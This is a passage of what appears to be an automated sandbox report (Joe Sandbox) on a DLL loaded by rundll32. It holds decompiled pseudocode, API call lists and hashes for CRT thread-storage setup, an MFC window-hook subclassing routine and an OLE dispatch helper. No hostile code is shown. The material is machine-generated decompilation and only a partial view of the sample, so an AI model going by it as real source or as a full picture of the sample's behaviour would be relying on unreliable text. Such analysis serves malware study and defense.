					 *0x100547c8 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10057938);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100310CD();
							 *0x10057934 = E10035042( *0x10057934);
							 *0x10057938 = E10035042( *0x10057938);
							 *0x1005793c = E10035042( *0x1005793c);
							 *0x10057940 = E10035042( *0x10057940);
							_t18 = E10035923();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10035178(_t37);
								goto L15;
							} else {
								_push(E10035304);
								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100547c4 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E10035840(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x100547c4);
										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E100351B5(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10035178(_t37);
					return 0;
				}
			}

















                                                                                                                      0x1003548e
                                                                                                                      0x1003548e
                                                                                                                      0x1003549a
                                                                                                                      0x1003549e
                                                                                                                      0x100354be
                                                                                                                      0x100354cb
                                                                                                                      0x100354d8
                                                                                                                      0x100354dd
                                                                                                                      0x100354df
                                                                                                                      0x100354e6
                                                                                                                      0x100354ec
                                                                                                                      0x100354f1
                                                                                                                      0x10035509
                                                                                                                      0x1003550e
                                                                                                                      0x10035518
                                                                                                                      0x10035522
                                                                                                                      0x10035528
                                                                                                                      0x100354f3
                                                                                                                      0x100354f3
                                                                                                                      0x100354fa
                                                                                                                      0x00000000
                                                                                                                      0x100354fc
                                                                                                                      0x100354fc
                                                                                                                      0x10035503
                                                                                                                      0x00000000
                                                                                                                      0x10035505
                                                                                                                      0x10035505
                                                                                                                      0x10035507
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10035507
                                                                                                                      0x10035503
                                                                                                                      0x100354fa
                                                                                                                      0x1003552d
                                                                                                                      0x10035533
                                                                                                                      0x10035536
                                                                                                                      0x1003553b
                                                                                                                      0x1003560d
                                                                                                                      0x1003560d
                                                                                                                      0x1003560d
                                                                                                                      0x10035541
                                                                                                                      0x10035548
                                                                                                                      0x1003554a
                                                                                                                      0x1003554c
                                                                                                                      0x00000000
                                                                                                                      0x10035552
                                                                                                                      0x10035552
                                                                                                                      0x10035568
                                                                                                                      0x10035578
                                                                                                                      0x10035588
                                                                                                                      0x10035595
                                                                                                                      0x1003559a
                                                                                                                      0x1003559f
                                                                                                                      0x100355a1
                                                                                                                      0x10035608
                                                                                                                      0x10035608
                                                                                                                      0x00000000
                                                                                                                      0x100355a3
                                                                                                                      0x100355a3
                                                                                                                      0x100355b4
                                                                                                                      0x100355b6
                                                                                                                      0x100355b9
                                                                                                                      0x100355be
                                                                                                                      0x00000000
                                                                                                                      0x100355c0
                                                                                                                      0x100355cc
                                                                                                                      0x100355ce
                                                                                                                      0x100355d2
                                                                                                                      0x00000000
                                                                                                                      0x100355d4
                                                                                                                      0x100355d4
                                                                                                                      0x100355d5
                                                                                                                      0x100355e9
                                                                                                                      0x100355eb
                                                                                                                      0x00000000
                                                                                                                      0x100355ed
                                                                                                                      0x100355ed
                                                                                                                      0x100355ef
                                                                                                                      0x100355f0
                                                                                                                      0x100355f7
                                                                                                                      0x100355fd
                                                                                                                      0x10035601
                                                                                                                      0x10035605
                                                                                                                      0x10035605
                                                                                                                      0x100355eb
                                                                                                                      0x100355d2
                                                                                                                      0x100355be
                                                                                                                      0x100355a1
                                                                                                                      0x1003554c
                                                                                                                      0x10035611
                                                                                                                      0x100354a0
                                                                                                                      0x100354a0
                                                                                                                      0x100354a8
                                                                                                                      0x100354a8

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E10030D90(E1004429C, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E10015B30);
				 *(_t117 - 0x120) = _t111;
				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E100201F1(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x10057854;
						if( *0x10057854 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x10057454;
								if( *0x10057454 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E10030030(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x10057454 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E10032D2F(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E1001B083(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
							__eflags = _t83 - E1001B780;
							if(_t83 != E1001B780) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E1001F30C();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E10014B55(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E10030E13(_t94, _t106, _t111);
				}
			}



























                                                                                                                      0x1001c915
                                                                                                                      0x1001c915
                                                                                                                      0x1001c915
                                                                                                                      0x1001c91f
                                                                                                                      0x1001c924
                                                                                                                      0x1001c927
                                                                                                                      0x1001c92a
                                                                                                                      0x1001c934
                                                                                                                      0x1001c93a
                                                                                                                      0x1001c941
                                                                                                                      0x1001c943
                                                                                                                      0x1001c946
                                                                                                                      0x1001c94e
                                                                                                                      0x1001c950
                                                                                                                      0x1001c950
                                                                                                                      0x1001c959
                                                                                                                      0x1001c96e
                                                                                                                      0x1001c970
                                                                                                                      0x1001c973
                                                                                                                      0x1001c978
                                                                                                                      0x1001c97a
                                                                                                                      0x1001c97e
                                                                                                                      0x1001c984
                                                                                                                      0x1001c99b
                                                                                                                      0x1001c99b
                                                                                                                      0x1001c9a2
                                                                                                                      0x1001c9ef
                                                                                                                      0x1001c9ef
                                                                                                                      0x1001c9f1
                                                                                                                      0x1001ca59
                                                                                                                      0x1001ca61
                                                                                                                      0x1001ca9d
                                                                                                                      0x1001caa9
                                                                                                                      0x1001cab0
                                                                                                                      0x1001cae2
                                                                                                                      0x1001cae5
                                                                                                                      0x1001caeb
                                                                                                                      0x1001caed
                                                                                                                      0x1001caf0
                                                                                                                      0x1001caf8
                                                                                                                      0x1001caff
                                                                                                                      0x1001cb01
                                                                                                                      0x1001cb03
                                                                                                                      0x1001cb0a
                                                                                                                      0x1001cb12
                                                                                                                      0x1001cb14
                                                                                                                      0x1001cb17
                                                                                                                      0x1001cb1a
                                                                                                                      0x1001cb28
                                                                                                                      0x1001cb28
                                                                                                                      0x1001cb17
                                                                                                                      0x1001cb03
                                                                                                                      0x1001cb2e
                                                                                                                      0x1001cb34
                                                                                                                      0x1001cb40
                                                                                                                      0x1001cb46
                                                                                                                      0x1001cb4d
                                                                                                                      0x1001cb4f
                                                                                                                      0x1001cb54
                                                                                                                      0x1001cb5a
                                                                                                                      0x1001cb5a
                                                                                                                      0x1001cb5a
                                                                                                                      0x1001cb5a
                                                                                                                      0x00000000
                                                                                                                      0x1001cb5e
                                                                                                                      0x00000000
                                                                                                                      0x1001cab2
                                                                                                                      0x1001ca65
                                                                                                                      0x1001ca70
                                                                                                                      0x1001ca7b
                                                                                                                      0x1001ca81
                                                                                                                      0x1001ca87
                                                                                                                      0x1001ca88
                                                                                                                      0x1001ca8a
                                                                                                                      0x1001ca92
                                                                                                                      0x1001ca95
                                                                                                                      0x1001ca9b
                                                                                                                      0x1001cac1
                                                                                                                      0x1001cac7
                                                                                                                      0x1001cac9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1001cad3
                                                                                                                      0x1001cad7
                                                                                                                      0x1001cadc
                                                                                                                      0x1001cae0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1001cae0
                                                                                                                      0x00000000
                                                                                                                      0x1001ca9b
                                                                                                                      0x1001c9f9
                                                                                                                      0x1001c9fe
                                                                                                                      0x1001ca05
                                                                                                                      0x1001ca0e
                                                                                                                      0x1001ca24
                                                                                                                      0x1001ca26
                                                                                                                      0x1001ca2c
                                                                                                                      0x1001ca2e
                                                                                                                      0x1001ca30
                                                                                                                      0x1001ca30
                                                                                                                      0x1001ca38
                                                                                                                      0x1001ca3c
                                                                                                                      0x1001ca40
                                                                                                                      0x1001ca44
                                                                                                                      0x1001ca4a
                                                                                                                      0x1001ca4d
                                                                                                                      0x1001ca4f
                                                                                                                      0x1001ca4f
                                                                                                                      0x00000000
                                                                                                                      0x1001ca44
                                                                                                                      0x1001c9a7
                                                                                                                      0x1001c9ad
                                                                                                                      0x1001c9b2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1001c9b8
                                                                                                                      0x1001c9bb
                                                                                                                      0x1001c9c0
                                                                                                                      0x1001c9cd
                                                                                                                      0x1001c9d1
                                                                                                                      0x1001c9d7
                                                                                                                      0x1001c9d7
                                                                                                                      0x1001c9e0
                                                                                                                      0x1001c9e5
                                                                                                                      0x1001c9e9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1001c9e9
                                                                                                                      0x1001c986
                                                                                                                      0x1001c98d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1001c993
                                                                                                                      0x1001c995
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1001c95b
                                                                                                                      0x1001c963
                                                                                                                      0x1001cb60
                                                                                                                      0x1001cb65
                                                                                                                      0x1001cb65

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 46%
                                                                                                                      			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10030DFF(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10030030(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E1002BDD9(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1002DAF2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10014517(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1002CDE9(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E1001FCED(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E100144EC(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E10033135(_t300 + 0x14, 0x100505f8);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
